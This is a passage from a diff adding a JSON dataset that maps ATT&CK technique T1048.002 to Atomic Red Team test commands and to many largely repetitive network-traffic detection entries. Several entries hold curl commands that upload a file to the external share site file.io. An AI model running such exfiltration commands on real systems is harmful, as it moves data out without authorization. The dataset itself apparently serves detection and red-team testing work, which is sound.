This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + } + ], + "external_reference": [ + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", + "https://github.com/Twi1ight/AD-Pentest-Script/blob/master/wmiexec.vbs", + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016", + "https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east", + "https://citizenlab.org/2016/05/stealth-falcon/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://securelist.com/muddywater/88059/", + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + 
"https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null + ] + }, + { + "technique_id": "T1048.002", + "command_list": [ + "#{curl_path} -F 'file=@PathToAtomicsFolder/T1048.002/src/artifact' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/\n", + "C:\\Windows\\System32\\Curl.exe -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/\n", + "curl -F 'file=@PathToAtomicsFolder/T1048.002/src/artifact' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/" + ], + "commands": [ + { + "command": "#{curl_path} -F 'file=@PathToAtomicsFolder/T1048.002/src/artifact' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/\n", + "source": "atomics/T1048.002/T1048.002.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol" + }, + { + "command": "C:\\Windows\\System32\\Curl.exe -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/\n", + "source": "atomics/T1048.002/T1048.002.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol" + }, + { + "command": "curl -F 'file=@PathToAtomicsFolder/T1048.002/src/artifact' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/", + "source": "atomics/T1048.002/T1048.002.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1048.002", + "display_name": "Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol", + "atomic_tests": [ + { + "name": "Exfiltrate data HTTPS using curl windows", + "auto_generated_guid": "1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0", + "description": "Exfiltrate data HTTPS using curl to file share site file.io\n", + 
"supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_file": { + "description": "Test file to upload", + "type": "Path", + "default": "PathToAtomicsFolder/T1048.002/src/artifact" + }, + "curl_path": { + "description": "path to curl.exe", + "type": "Path", + "default": "C:\\Windows\\System32\\Curl.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Curl must be installed on system.\n", + "prereq_command": "if (Test-Path #{curl_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip\" -Outfile $env:temp\\curl.zip\nExpand-Archive -Path $env:temp\\curl.zip -DestinationPath $env:temp\\curl\nCopy-Item $env:temp\\curl\\curl-7.79.1-win64-mingw\\bin\\curl.exe C:\\Windows\\System32\\Curl.exe\nRemove-Item $env:temp\\curl\nRemove-Item $env:temp\\curl.zip\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "#{curl_path} -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/\n" + } + }, + { + "name": "Exfiltrate data HTTPS using curl linux", + "auto_generated_guid": "4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01", + "description": "Exfiltrate data HTTPS using curl to file share site file.io\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "input_file": { + "description": "Test file to upload", + "type": "Path", + "default": "PathToAtomicsFolder/T1048.002/src/artifact" + } + }, + "executor": { + "name": "bash", + "elevation_required": false, + "command": "curl -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
